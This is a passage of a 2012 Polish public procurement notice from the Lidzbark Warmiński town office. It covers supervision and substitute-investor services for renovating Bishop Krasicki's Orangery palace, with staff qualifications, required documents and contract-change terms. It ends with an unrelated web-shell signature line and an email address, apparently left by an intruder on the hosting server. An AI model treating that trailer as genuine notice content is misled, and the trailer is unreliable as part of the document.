- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej wydane na podstawie aktualnych przepisów ustawy Prawo budowlane, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- co najmniej 3 letnie doświadczenie w kierowaniu budową lub robotami budowlanymi, lub w wykonywaniu nadzoru inwestorskiego,	

	   Osoby, o których mowa wyżej  i które uzyskały kwalifikacje do wykonywania
 	samodzielnych funkcji technicznych w Rzeczypospolitej Polskiej, muszą być 
  	wpisane na listę członków  właściwej izby samorządu zawodowego i ubezpieczone od odpowiedzialności cywilnej, co daje prawo wykonywania samodzielnych funkcji
  	technicznych w budownictwie, zgodnie z ustawą z dnia 15.12.2000r.                               o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001r., Nr 5, poz. 42 z późn. zm.). Oprócz osób, o których mowa wyżej                 w wykonaniu zamówienia mogą wziąć udział również osoby, będące obywatelami państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, spełniający  wymagania zawarte  w ustawie  z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2010 r. Nr 243, poz. 1623, z późn. zm.), a w szczególności w art. 12a oraz                w ustawie z dnia 18 marca 2008 r. o  zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).
 Wymienione w pkt. 1.3.1 osoby nie wyczerpują wymagań dla rzetelnego     
 wypełnienia zobowiązań Wykonawcy i powinny być traktowane jako minimalne     
 wymagania Zamawiającego. Wykonawca powinien zapewnić swoim specjalistom  
 niezbędne wsparcie i pomoc techniczną ze strony innych specjalistów, którzy mogą 
 być niezbędni do właściwego wykonania umowy
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą   
wykazać, że łącznie spełniają powyższy warunek.

1.3.2 W zakresie zadania nr 2 - Pełnienie kompleksowego nadzoru konserwatorskiego                          w  projekcie pn.: Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz 
z zagospodarowaniem terenów wokół oraz zakup wyposażenia

Zamawiający uzna, że Wykonawca  spełnia niniejszy warunek, jeżeli Wykonawca  
wykaże, że dysponuje  następującymi osobami, które będą uczestniczyć w wykonaniu zamówienia:
a)	Osoba 1 -  Kierownik Zespołu - Inspektor nadzoru badań i prac konserwatorskich, posiadający uprawnienia do prowadzenia prac konserwatorskich, prac restauratorskich oraz badań konserwatorskich, określone w § 22 ust. 1 
Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r.                     w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011 r. Nr 165 poz. 987) tj. tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów na kierunku konserwacja i restauracja dzieł sztuki lub w specjalności w zakresie konserwacji zabytków oraz odbył po ukończeniu tych studiów co najmniej 12-miesięczną praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru zabytków,
b)	Osoba 2 - Inspektor nadzoru prac konserwatorskich zieleni zabytkowej, posiadający uprawnienia  do prowadzenia prac konserwatorskich oraz prac restauratorskich polegających na zabezpieczeniu, uzupełnieniu, rekonstrukcji lub konserwacji parków wpisanych do rejestru zabytków albo innego rodzaju zorganizowanej zieleni wpisanej do rejestru zabytków, określone w § 23 ust. 1 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r.                     w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011 r. Nr 165 poz. 987) tj. tytuł zawodowy magistra lub magistra inżyniera uzyskany po ukończeniu studiów wyższych, obejmujących wiadomości w ww. zakresie oraz odbył po ukończeniu tych studiów co najmniej 12 - miesięczną praktykę zawodową przy konserwacji                            i pielęgnacji tego rodzaju zabytków wpisanych do rejestru zabytków,

Wymienione w pkt. 1.3.2 osoby nie wyczerpują wymagań dla rzetelnego     
wypełnienia zobowiązań Wykonawcy i powinny być traktowane jako minimalne     
wymagania Zamawiającego. Wykonawca powinien zapewnić swoim specjalistom  
niezbędne wsparcie i pomoc techniczną ze strony innych specjalistów, którzy mogą 
być niezbędni do właściwego wykonania umowy
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą   
wykazać, że łącznie spełniają powyższy warunek.

1.3.3 W zakresie zadania nr 3 - Pełnienie funkcji inwestora zastępczego w projekcie pn.: Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz                                            z zagospodarowaniem terenów wokół oraz zakup wyposażenia

Zamawiający uzna, że Wykonawca  spełnia niniejszy warunek, jeżeli Wykonawca  
wykaże, że dysponuje  następującymi osobami, które będą uczestniczyć w wykonaniu zamówienia:
a)	Osoba 1 - Kierownik Zespołu, posiadający: 
- uprawnienia budowlane  do kierowania robotami w specjalności konstrukcyjno-budowlanej, wydane na podstawie aktualnych przepisów Prawo budowalne, lub odpowiadające im ważne  uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- co najmniej 5 letnie doświadczenie w kierowaniu budową lub robotami budowlanymi, lub w wykonywaniu nadzoru inwestorskiego,
b)	Osoba 2 - Specjalista ds. Rozliczeń, posiadający:
- wyższe wykształcenie ekonomiczne lub techniczne lub zarządzanie, 
- doświadczenie  w rozliczeniu co najmniej jednej zakończonej inwestycji.

  Osoba wymieniona w pkt. 1.3.3 lit a, która uzyskała kwalifikacje do wykonywania
 	samodzielnych funkcji technicznych w Rzeczypospolitej Polskiej, musi być wpisana na listę członków  właściwej izby samorządu zawodowego i ubezpieczona od odpowiedzialności cywilnej, co daje prawo wykonywania samodzielnych funkcji
  	technicznych w budownictwie, zgodnie z ustawą z dnia 15.12.2000r.                               o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001r., Nr 5, poz. 42 z późn. zm.). Oprócz osoby, o której mowa wyżej                 w wykonaniu zamówienia mogą wziąć udział również osoby, będące obywatelami państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, spełniający  wymagania zawarte  w ustawie  z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2010 r. Nr 243, poz. 1623, z późn. zm.), a w szczególności w art. 12a oraz        w ustawie z dnia 18 marca 2008 r. o  zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).

Wymienione w pkt. 1.3.3 osoby nie wyczerpują wymagań dla rzetelnego     
 wypełnienia zobowiązań Wykonawcy i powinny być traktowane jako minimalne     
 wymagania Zamawiającego. Wykonawca powinien zapewnić swoim specjalistom  
 niezbędne wsparcie i pomoc techniczną ze strony innych specjalistów, którzy mogą 
 być niezbędni do właściwego wykonania umowy
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą   
wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia ww. warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz Oferty, sporządzony według wzoru stanowiącego  załącznik nr 1 do SIWZ,
2. Stosowne Pełnomocnictwo(a) - w przypadku, gdy uprawnienie do podpisania oferty 
      nie wynika bezpośrednio z dokumentów załączonych do oferty. W przypadku 	Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dokument 	ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie 	zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie 	niniejszego zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany w treści umowy w stosunku do treści oferty mogą być dokonane na skutek 
zaistnienia okoliczności niemożliwych wcześniej do przewidzenia, a w szczególności:
1)	okoliczności uniemożliwiające realizację przedmiotu umowy w terminie, w tym:
a)	zmiana zakresu nadzorowanych robót budowlanych, wystąpienie robót zamiennych lub dodatkowych od wykonania których uzależnione jest wykonanie zamówienia podstawowego, 	może spowodować zmianę terminu realizacji Umowy, 
b)	wystąpienie przestojów robót budowlanych spowodowanych koniecznością usunięcia uszkodzeń istniejących sieci i urządzeń podziemnych, wystąpienie nieprzewidzianych warunków geologicznych, archeologicznych lub terenowych, w szczególności: niewypały i niewybuchy, wykopaliska archeologiczne lub wstrzymanie wykonania robót przez uprawnione organy, może spowodować zmianę terminu realizacji Umowy,
c)	wystąpienie Siły Wyższej uniemożliwiającej realizację inwestycji może spowodować zmianę terminu realizacji Umowy.
d)	zmiany przepisów prawa mających wpływ na treść niniejszej umowy; 
e)	działań organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji umowy, 
f)	działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne) mającej   
        bezpośredni wpływ na terminowość realizacji umowy.
2)	W przypadku wystąpienia opóźnień, będących wynikiem zdarzeń opisanych w ust. 1,    
            strony  ustalą nowe terminy realizacji z zastrzeżeniem, iż maksymalny okres   
            przesunięcia terminu zakończenia realizacji umowy będzie równy okresowi przerwy.
3) wystąpienie okoliczności powodujących konieczność rezygnacji przez Zamawiającego 	               
    z części zakresu robót realizowanych przez wykonawcę robót budowlanych                              
    w  ramach projektu, nie zachodzi konieczność ich wykonania, ograniczenia lub przerwania 
    dofinansowania realizacji inwestycji ze środków Unii Europejskiej	w ramach Regionalnego  
    Programu Operacyjnego Warmia i Mazury na lata 2007-2013. W takich przypadkach 
    wynagrodzenie 
    zostanie pomniejszone przez zastosowanie procentu, o jaki zmniejszyła się wartość robót   
    budowlanych.
2. Zmiana umowy może również nastąpić:
1) W przypadku nie wykonania części  lub całości zamówienia z powodu tego, że wykonanie 
    zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć w chwili 
    zawarcia umowy wysokość wynagrodzenia Wykonawcy zostanie zmniejszona o wartość 
    usług niewykonanych,
2) W przypadku zmiany osób reprezentujących strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://lidzbarkw-um.bip-wm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. A. Świętochowskiego 14, pok. nr 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2012 godzina 12:00, miejsce: Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. A. Świętochowskiego 14, pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany ze środków  Europejskiego Funduszu Rozwoju
Regionalnego w ramach:
Osi Priorytetowej 2 - Turystyka,
Działanie 2.1 - Wzrost potencjału turystycznego,
Poddziałanie 2.1.5 - Dziedzictwo kulturowe
Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie kompleksowego nadzoru inwestorskiego w projekcie pn.:
     Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz                           
     z zagospodarowaniem terenów wokół oraz zakup wyposażenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.13.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie kompleksowego nadzoru konserwatorskiego w projekcie pn.:
     Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz                           
     z zagospodarowaniem terenów wokół oraz zakup wyposażenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.52.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji inwestora zastępczego w projekcie pn.: Renowacja
     letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz                                       
     z zagospodarowaniem terenów wokół oraz zakup wyposażenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.54.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com